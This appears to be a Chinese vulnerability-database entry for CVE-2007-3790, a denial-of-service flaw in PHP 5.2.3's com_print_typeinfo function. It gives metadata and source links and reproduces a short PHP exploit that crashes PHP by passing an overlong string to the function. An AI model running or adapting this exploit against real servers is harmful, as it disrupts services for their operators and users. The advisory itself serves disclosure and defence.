PHP com_print_typeinfo函数拒绝服务

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113299 漏洞类型 未知
发布时间 2007-07-12 更新时间 2007-07-15
CVE编号 CVE-2007-3790 CNNVD-ID CNNVD-200707-276
漏洞平台 Multiple CVSS评分 5.8
|漏洞来源
https://www.exploit-db.com/exploits/4175
https://www.securityfocus.com/bid/85604
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-276
|漏洞详情
PHP5.2.3版本中的bz2扩展名的com_print_typeinfo函数允许见机行事的攻击者可以借助一个超长的自变量,造成拒绝服务。
|漏洞EXP
<?php
//PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp sp2, worked both from the cli and on apache

//Bug discovered with "Footzo" (thanks to rgod).
//
//To download Footzo:
//original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar
//alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar

if (!extension_loaded("bz2")){die("you need bz2 extension loaded!");}

$buff = str_repeat("a",1000);

com_print_typeinfo($buff);

?>

# milw0rm.com [2007-07-12]
|受影响的产品
PHP PHP 5.2.3
|参考资料

来源:MILW0RM
名称:4175
链接:http://www.milw0rm.com/exploits/4175